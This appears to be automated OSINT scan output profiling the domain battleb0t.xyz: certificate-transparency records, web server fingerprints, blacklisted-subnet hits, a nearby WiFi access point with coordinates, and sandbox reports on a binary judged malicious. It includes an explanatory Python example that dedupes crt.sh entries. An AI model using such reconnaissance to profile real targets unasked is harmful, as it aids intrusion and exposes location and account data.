74:d0:93:ed:30:c2:a8:1b:7a:94:f2:58:8e:6d:bd:c5:15:f9:
a0:e1:79:05
| battleb0t.xyz |
| 2023-05-12 02:44:30 | Internet Name | No | DNS Resolver | 1 | 0 | 2 | 0 | None | funny.battleb0t.xyz | [{u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:50.261', u'id': 9313572020}, {u'not_after': u'2023-08-02T19:22:48', u'not_before': u'2023-05-04T19:22:49', u'issuer_ca_id': 183267, u'name_value': u'nwapi2.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi2.battleb0t.xyz', u'serial_number': u'0450556de56492a07fd0de032baf77c2fcfe', u'entry_timestamp': u'2023-05-04T20:22:49.987', u'id': 9308913897}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.484', u'id': 9249459074}, {u'not_after': u'2023-07-25T02:43:30', u'not_before': u'2023-04-26T02:43:31', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'038dd7e0051838a5db8a4864f2689a9822c8', u'entry_timestamp': u'2023-04-26T03:43:31.388', u'id': 9234809365}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:13.113', u'id': 9235878846}, {u'not_after': u'2023-07-23T04:50:11', u'not_before': u'2023-04-24T04:50:12', 
u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'03d7564b39cd635b72071eba15c9f72ce733', u'entry_timestamp': u'2023-04-24T05:50:12.941', u'id': 9221147142}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.973', u'id': 9235401447}, {u'not_after': u'2023-07-23T03:43:00', u'not_before': u'2023-04-24T03:43:01', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'044e821a86ae7d8a393c2524c646dfb3a2f4', u'entry_timestamp': u'2023-04-24T04:43:01.703', u'id': 9220770682}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.723', u'id': 9022375882}, {u'not_after': u'2023-06-25T17:04:52', u'not_before': u'2023-03-27T17:04:53', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0474c76909bebf855383950e845e236b8f95', u'entry_timestamp': u'2023-03-27T18:04:53.353', u'id': 8994750711}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': 
u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.489', u'id': 9021136086}, {u'not_after': u'2023-06-25T13:22:32', u'not_before': u'2023-03-27T13:22:33', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'038880c39ce1f505d4ceeba7b88b966916e7', u'entry_timestamp': u'2023-03-27T14:22:33.221', u'id': 9002142810}, {u'not_after': u'2023-06-21T22:37:04', u'not_before': u'2023-03-23T22:37:05', u'issuer_ca_id': 180753, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O=Google Trust Services LLC, CN=GTS CA 1P5', u'common_name': u'*.battleb0t.xyz', u'serial_number': u'26cc7f01c692257813509e4880751557', u'entry_timestamp': u'2023-03-23T23:37:05.821', u'id': 8969484265}, {u'not_after': u'2024-03-21T23:59:59', u'not_before': u'2023-03-23T00:00:00', u'issuer_ca_id': 157938, u'name_value': u'*.battleb0t.xyz\nbattleb0t.xyz', u'issuer_name': u'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3', u'common_name': u'sni.cloudflaressl.com', u'serial_number': u'09cccb40358f10167bc737cb947e311a', u'entry_timestamp': u'2023-03-23T22:34:16.439', u'id': 8968494929}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.433', u'id': 8986351441}, {u'not_after': u'2023-06-21T20:32:57', u'not_before': u'2023-03-23T20:32:58', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'0399a35c44138f1ff49f74e54fad57818324', u'entry_timestamp': u'2023-03-23T21:32:58.351', u'id': 8968126634}, {u'not_after': u'2023-06-13T23:40:09', 
u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.184', u'id': 8924480030}, {u'not_after': u'2023-06-13T23:40:09', u'not_before': u'2023-03-15T23:40:10', u'issuer_ca_id': 183267, u'name_value': u'funny.battleb0t.xyz\npics.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'funny.battleb0t.xyz', u'serial_number': u'03026deb8d637804f2b85cdb3906ab26eda9', u'entry_timestamp': u'2023-03-16T00:40:11.009', u'id': 8896621265}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.523', u'id': 8910975043}, {u'not_after': u'2023-06-11T12:52:04', u'not_before': u'2023-03-13T12:52:05', u'issuer_ca_id': 183267, u'name_value': u'kekw.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'kekw.battleb0t.xyz', u'serial_number': u'0323361a726efc710949b135f9b5e52880de', u'entry_timestamp': u'2023-03-13T13:52:05.327', u'id': 8879939167}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.355', u'id': 8910971688}, {u'not_after': u'2023-06-11T12:50:46', u'not_before': u'2023-03-13T12:50:47', u'issuer_ca_id': 183267, u'name_value': u'nwapi.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': 
u'nwapi.battleb0t.xyz', u'serial_number': u'043a9d01de8fdba2524a020c1870da44ddbc', u'entry_timestamp': u'2023-03-13T13:50:48.097', u'id': 8879934651}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.564', u'id': 8805533709}, {u'not_after': u'2023-05-26T01:39:24', u'not_before': u'2023-02-25T01:39:25', u'issuer_ca_id': 183267, u'name_value': u'battleb0t.xyz\nwww.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'battleb0t.xyz', u'serial_number': u'04b63933afde1e32f3fc2e76dcbc08518610', u'entry_timestamp': u'2023-02-25T02:39:25.238', u'id': 8735518973}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.219', u'id': 8798937211}, {u'not_after': u'2023-05-25T03:05:10', u'not_before': u'2023-02-24T03:05:11', u'issuer_ca_id': 183267, u'name_value': u'oldfluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'oldfluid.battleb0t.xyz', u'serial_number': u'04910865b45694e389376bc8ee5afcf48052', u'entry_timestamp': u'2023-02-24T04:05:12.05', u'id': 8726555656}, {u'not_after': u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.851', u'id': 8798923488}, {u'not_after': 
u'2023-05-25T03:02:52', u'not_before': u'2023-02-24T03:02:53', u'issuer_ca_id': 183267, u'name_value': u'fluid.battleb0t.xyz', u'issuer_name': u"C=US, O=Let's Encrypt, CN=R3", u'common_name': u'fluid.battleb0t.xyz', u'serial_number': u'0397995c60ac4068f8b2de0a677adab7d116', u'entry_timestamp': u'2023-02-24T04:02:53.639', u'id': 8726539247}, {u'not_after': u'2023-05-14T15:23:50', u'not_before': u'2023-02-13T15: |
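The CertSpotter certificate dump and the crt.sh records in the DNS Resolver row above describe the same issuances: the CertSpotter serial 03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9 reappears in crt.sh as 03026deb8d637804f2b85cdb3906ab26eda9, twice, because crt.sh logs the precertificate and the final leaf as separate entries. The following added example, not part of the scan output, collapses crt.sh-style records into a hostname inventory: it dedupes precert/leaf pairs by serial, splits the newline-joined SAN list, keeps wildcards and CNs outside the apex (sni.cloudflaressl.com, i.e. a shared CDN certificate rather than a host the target runs) apart from real hostnames, and cross-references an openssl-formatted serial. RECORDS is a constructed subset with the values copied from the rows above; the function names are this example's own.

```python
"""Collapse crt.sh-style CT records into a host inventory (added example)."""

APEX = "battleb0t.xyz"
# Serial as printed in the CertSpotter dump above (openssl colon-separated form).
OPENSSL_SERIAL = "03:02:6d:eb:8d:63:78:04:f2:b8:5c:db:39:06:ab:26:ed:a9"

# Constructed subset of the crt.sh records shown in the DNS Resolver row, keeping
# only the keys used here. One issuance appears twice (precert + leaf): same
# serial, different id and entry_timestamp.
RECORDS = [
    {"id": 8924480030, "entry_timestamp": "2023-03-16T00:40:11.184",
     "serial_number": "03026deb8d637804f2b85cdb3906ab26eda9",
     "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "funny.battleb0t.xyz",
     "name_value": "funny.battleb0t.xyz\npics.battleb0t.xyz"},
    {"id": 8896621265, "entry_timestamp": "2023-03-16T00:40:11.009",
     "serial_number": "03026deb8d637804f2b85cdb3906ab26eda9",
     "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "funny.battleb0t.xyz",
     "name_value": "funny.battleb0t.xyz\npics.battleb0t.xyz"},
    {"id": 8969484265, "entry_timestamp": "2023-03-23T23:37:05.821",
     "serial_number": "26cc7f01c692257813509e4880751557",
     "issuer_name": "C=US, O=Google Trust Services LLC, CN=GTS CA 1P5",
     "common_name": "*.battleb0t.xyz", "name_value": "*.battleb0t.xyz\nbattleb0t.xyz"},
    {"id": 8968494929, "entry_timestamp": "2023-03-23T22:34:16.439",
     "serial_number": "09cccb40358f10167bc737cb947e311a",
     "issuer_name": 'C=US, O="Cloudflare, Inc.", CN=Cloudflare Inc ECC CA-3',
     "common_name": "sni.cloudflaressl.com", "name_value": "*.battleb0t.xyz\nbattleb0t.xyz"},
    {"id": 9313572020, "entry_timestamp": "2023-05-04T20:22:50.261",
     "serial_number": "0450556de56492a07fd0de032baf77c2fcfe",
     "issuer_name": "C=US, O=Let's Encrypt, CN=R3", "common_name": "nwapi2.battleb0t.xyz",
     "name_value": "nwapi2.battleb0t.xyz"},
]


def normalise_serial(serial):
    """Lowercase hex without separators, so openssl's '03:02:6d:...' and
    crt.sh's '03026deb...' compare equal (leading zero kept, as crt.sh prints it)."""
    return serial.replace(":", "").replace(" ", "").lower()


def dedupe_by_serial(records):
    """One record per serial (precert + leaf collapse), keeping the earliest
    CT entry as the certificate's first-seen time."""
    unique = {}
    for rec in records:
        key = normalise_serial(rec["serial_number"])
        if key not in unique or rec["entry_timestamp"] < unique[key]["entry_timestamp"]:
            unique[key] = rec
    return unique


def find_by_serial(records, serial):
    """Cross-reference a serial taken from another source (openssl text, CertSpotter)."""
    return dedupe_by_serial(records).get(normalise_serial(serial))


def in_scope(name, apex):
    return name == apex or name.endswith("." + apex)


def summarise(records, apex):
    """Hostnames under the apex, wildcards, out-of-scope SANs and foreign CNs."""
    unique = dedupe_by_serial(records)
    hosts, wildcards, others = set(), set(), set()
    for rec in unique.values():
        for name in rec["name_value"].split("\n"):  # crt.sh joins SANs with newlines
            name = name.strip().lower()
            if name.startswith("*."):
                wildcards.add(name)
            elif in_scope(name, apex):
                hosts.add(name)
            elif name:
                others.add(name)
    return {
        "raw_entries": len(records),
        "unique_certs": len(unique),
        "hosts": sorted(hosts),
        "wildcards": sorted(wildcards),
        "other_sans": sorted(others),
        # A CN outside the apex means the SAN rides on a shared CDN certificate,
        # not on a server the target operates.
        "foreign_cn": sorted(r["common_name"] for r in unique.values()
                             if not in_scope(r["common_name"], apex)),
        "issuers": sorted({r["issuer_name"] for r in unique.values()}),
    }


if __name__ == "__main__":
    for k, v in summarise(RECORDS, APEX).items():
        print(f"{k:14} {v}")
    print("CertSpotter serial ->", find_by_serial(RECORDS, OPENSSL_SERIAL)["id"])
```

Counting raw crt.sh entries overstates certificate churn by about 2x because of the precert/leaf pairs; deduping on the serial (never on the crt.sh id) is the fix. The earliest entry_timestamp is the right first-seen value, since it is the moment the issuance became publicly visible.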
| 2023-05-12 03:42:18 | WiFi Access Point Nearby | No | Wigle.net | 0 | 0 | 4 | 0 | None | SitecomC8B210 (Net ID: 00:0C:F6:C8:B2:10) | 50.8897, 6.0563 |
| 2023-05-12 03:01:37 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.97.138): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.97.0/24 |
| 2023-05-12 03:01:23 | Raw Data from RIRs | No | Tool - WhatWeb | 0 | 0 | 1 | 0 | None | [{u'request_config': {u'headers': {u'User-Agent': u'Mozilla/5.0'}}, u'target': u'http://battleb0t.xyz', u'http_status': 301, u'plugins': {u'Via-Proxy': {u'string': [u'1.1 varnish']}, u'HTTPServer': {u'string': [u'GitHub.com']}, u'RedirectLocation': {u'string': [u'https://battleb0t.xyz/']}, u'UncommonHeaders': {u'string': [u'x-github-request-id,x-served-by,x-cache-hits,x-timer,x-fastly-request-id']}, u'IP': {u'string': [u'185.199.109.153']}, u'Title': {u'string': [u'301 Moved Permanently']}}}, {}] | battleb0t.xyz |
| 2023-05-12 02:44:40 | Software Used | Yes | Tool - Wappalyzer | 0 | 0 | 2 | 0 | None | Netlify | funny.battleb0t.xyz |
| 2023-05-12 03:01:10 | Blacklisted IP on Same Subnet | Yes | Honeypot Checker | 0 | 0 | 3 | 0 | None | Honeypotproject (188.114.96.121): Search Engine; Last Activity: 0 days ago; Threat Level: 29 | 188.114.96.0/24 |
| 2023-05-12 02:46:23 | Raw Data from RIRs | No | Hybrid Analysis | 0 | 0 | 2 | 0 | None | [{u'subsystem': None, u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 0, u'threat_score': None, u'compromised_hosts': [], u'environment_id': None, u'major_os_version': None, u'submit_name': u'bounty-92442219031035527', u'signatures': [], u'threat_level': 2, u'size': 1419336, u'job_id': None, u'target_url': None, u'interesting': False, u'error_type': None, u'state': u'SUCCESS', u'entrypoint': None, u'mitre_attcks': [], u'certificates': [], u'hosts': [], u'sha256': u'ac2a1743bbfc19268c36280b50a003366d41854863d4808099cd87f77fa5f433', u'sha512': u'e273fdf72f1e793f0e64d4f3e1a806ab4ef5a8ad408ba7ae3c2b076ac23bbd1b9119523cafeb5e192434a0f346295466fc22237ed2126ed8e55e0f8da6d242d9', u'image_file_characteristics': [], u'submissions': [{u'url': None, u'submission_id': u'645d3ce2af7b0ff2260e5236', u'created_at': u'2023-05-11T19:07:14+00:00', u'filename': u'bounty-90327936975996565'}, {u'url': None, u'submission_id': u'645a116ce5c0a446340055ff', u'created_at': u'2023-05-09T09:25:00+00:00', u'filename': u'bounty-39937054808366222'}, {u'url': None, u'submission_id': u'645a116b8df30921840aa091', u'created_at': u'2023-05-09T09:24:59+00:00', u'filename': u'bounty-560768034402953'}, {u'url': None, u'submission_id': u'644d33e57683d791910db8fd', u'created_at': u'2023-04-29T15:12:37+00:00', u'filename': u'bounty-29178209918618665'}, {u'url': None, u'submission_id': u'644d33d56c17eff7d8016bf3', u'created_at': u'2023-04-29T15:12:21+00:00', u'filename': u'bounty-82711745860172702'}, {u'url': None, u'submission_id': u'644cddb7bb622c5f61019549', u'created_at': u'2023-04-29T09:04:55+00:00', u'filename': u'bounty-21770663952260623'}, {u'url': None, u'submission_id': u'64469d8b5cbe8e496109f46d', u'created_at': u'2023-04-24T15:17:31+00:00', u'filename': u'rufus-3.22.exe'}, {u'url': None, u'submission_id': 
u'642ccd07ae9486a8b0093780', u'created_at': u'2023-04-05T01:21:11+00:00', u'filename': u'bounty-92500669916413772'}, {u'url': None, u'submission_id': u'642ccd05dbb8e3e14b0f62a6', u'created_at': u'2023-04-05T01:21:09+00:00', u'filename': u'bounty-92442219031035527'}], u'analysis_start_time': u'2023-04-05T01:21:09+00:00', u'tags': [], u'imphash': None, u'total_network_connections': 0, u'av_detect': 0, u'machine_learning_models': [], u'total_signatures': 0, u'image_base': None, u'error_origin': None, u'ssdeep': None, u'entrypoint_section': None, u'md5': u'f3a93569ce2aa9409e2ffba3d7edb4db', u'network_mode': u'default', u'processes': [], u'sha1': u'f68e9d61523742e40ff2760972feb40286bdef55', u'url_analysis': False, u'type': u'PE32 executable (GUI) Intel 80386 (stripped to external PDB), for MS Windows, UPX compressed', u'file_metadata': None, u'dll_characteristics': [], u'vx_family': None, u'environment_description': u'Static Analysis', u'verdict': u'malicious', u'minor_os_version': None, u'domains': [], u'extracted_files': [], u'type_short': [u'peexe', u'executable']}, {u'subsystem': u'Windows Gui', u'classification_tags': [], u'crowdstrike_ai': {u'executable_process_memory_analysis': [], u'analysis_related_urls': []}, u'total_processes': 1, u'threat_score': None, u'compromised_hosts': [], u'environment_id': 100, u'major_os_version': 4, u'submit_name': u'rufus-3.22.exe', u'signatures': [{u'category': u'General', u'origin': u'API Call', u'identifier': u'api-176', u'name': u'Calls an API typically used to retrieve function address', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1106', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1106', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-3.22.exe" called "GetProcAddress" with a parameter BufferedPaintUnInit (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter ImmGetContext (UID: 00000000-00003036)\n "rufus-3.22.exe" called 
"GetProcAddress" with a parameter ImmReleaseContext (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter GetThemeTextExtent (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter AcquireSRWLockExclusive (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter ReleaseSRWLockExclusive (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter RegisterTraceGuidsW (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter OpenThreadToken (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter OpenProcessToken (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter AllocateAndInitializeSid (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter CheckTokenMembership (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter FreeSid (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter InternetCrackUrlA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter InternetConnectA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter InternetReadFile (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter InternetCloseHandle (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter HttpOpenRequestA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter HttpSendRequestA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter HttpQueryInfoA (UID: 00000000-00003036)\n "rufus-3.22.exe" called "GetProcAddress" with a parameter FlsGetValue (UID: 00000000-00003036)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-7', u'name': u'Loads modules at runtime', u'attck_id_wiki': 
u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-3.22.exe" loaded module "COMCTL32.DLL" at base 73b70000\n "rufus-3.22.exe" loaded module "API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL" at base 74dc0000\n "rufus-3.22.exe" loaded module "WININET" at base 754d0000\n "rufus-3.22.exe" loaded module "KERNEL32.DLL" at base 76f60000\n "rufus-3.22.exe" loaded module "ADVAPI32.DLL" at base 76b50000\n "rufus-3.22.exe" loaded module "COMDLG32.DLL" at base 75780000\n "rufus-3.22.exe" loaded module "CRYPT32.DLL" at base 74dd0000\n "rufus-3.22.exe" loaded module "GDI32.DLL" at base 75990000\n "rufus-3.22.exe" loaded module "MSVCRT.DLL" at base 75c40000\n "rufus-3.22.exe" loaded module "OLE32.DLL" at base 75800000\n "rufus-3.22.exe" loaded module "SHELL32.DLL" at base 75f00000\n "rufus-3.22.exe" loaded module "SHLWAPI.DLL" at base 76cf0000\n "rufus-3.22.exe" loaded module "USER32.DLL" at base 75d80000\n "rufus-3.22.exe" loaded module "SSPICLI.DLL" at base 74b80000\n "rufus-3.22.exe" loaded module "RPCRT4.DLL" at base 75e50000\n "rufus-3.22.exe" loaded module "PROFAPI.DLL" at base 74d00000'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-175', u'name': u'Calls an API typically used to load libraries', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"rufus-3.22.exe" called "LoadLibrary" with a parameter comctl32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter api-ms-win-downlevel-advapi32-l1-1-0.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter WinInet (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter KERNEL32.DLL (UID: 00000000-00003036)\n 
"rufus-3.22.exe" called "LoadLibrary" with a parameter ADVAPI32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter COMCTL32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter COMDLG32.DLL (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter CRYPT32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter GDI32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter msvcrt.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter ole32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter SHELL32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter SHLWAPI.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter USER32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter kernel32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter SspiCli.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter WINTRUST.DLL (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter %WINDIR%\\system32\\CRYPT32.dll (UID: 00000000-00003036)\n "rufus-3.22.exe" called "LoadLibrary" with a parameter imagehlp.dll (UID: 00000000-00003036)'}, {u'category': u'General', u'origin': u'API Call', u'identifier': u'api-8', u'name': u'Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)', u'attck_id_wiki': u'https://attack.mitre.org/techniques/T1129', u'threat_level_human': u'informative', u'capec_id': None, u'attck_id': u'T1129', u'relevance': 1, u'threat_level': 0, u'type': 6, u'description': u'"150016002c7ab36c@ADVAPI32.dll"\n "0e000f00a47ab36c@ADVAPI32.dll"\n 
"0e000f00d87ab36c@ADVAPI32.dll"\n "11001200a47fb36c@ADVAPI32.dll"\n "12001300b87fb36c@ADVAPI32.dll"\n "12001300e07fb36c@ADVAPI32.dll"\n "140015009493b36c@ADVAPI32.dll"\n "0d000e00588fb36c@WinInet.DLL"\n "0d000e00a08fb36c@WinInet.DLL"\n "10001100b08fb36c@WinInet.DLL"\n "100011002890b36c@WinInet.DLL"\n "100011003c90b36c@WinInet.DLL"\n "0d000e000080b36c@SHELL32.dll"\n "0d000e005480b36c@SHELL32.dll"\n "100011000094b36c@CRYP | 185.199.111.153 |
| 2023-05-12 03:09:01 | Affiliate - IP Address | No | DNS Look-aside | 1 | 0 | 2 | 0 | None | 87.248.157.97 | 87.248.157.102 |
| 2023-05-12 02:54:12 | HTTP Headers | No | Web Spider | 8 | 0 | 1 | 0 | None | {"content-length": "690", "via": "1.1 varnish", "vary": "Accept-Encoding", "etag": "W/\"642b434c-4fb\"", "x-cache-hits": "1", "cache-control": "max-age=600", "x-served-by": "cache-ewr18140-EWR", "x-cache": "HIT", "x-github-request-id": "1AD4:4FA0:AFAB37:106D10A:645DA7F4", "accept-ranges": "bytes", "expires": "Fri, 12 May 2023 02:54:04 GMT", "last-modified": "Mon, 03 Apr 2023 21:21:16 GMT", "x-fastly-request-id": "47e9025f17d9e6e936d804b3c00d7989ec4a827a", "date": "Fri, 12 May 2023 02:54:12 GMT", "access-control-allow-origin": "*", "x-proxy-cache": "MISS", "content-encoding": "gzip", "age": "559", "x-timer": "S1683860053.987504,VS0,VE2", "server": "GitHub.com", "connection": "keep-alive", "content-type": "text/html; charset=utf-8"} | battleb0t.xyz |
| 2023-05-12 03:19:09 | Account on External Site | No | Account Finder | 0 | 0 | 6 | 0 | None | KnowYourMeme (Category: social) https://knowyourmeme.com/users/login | login |
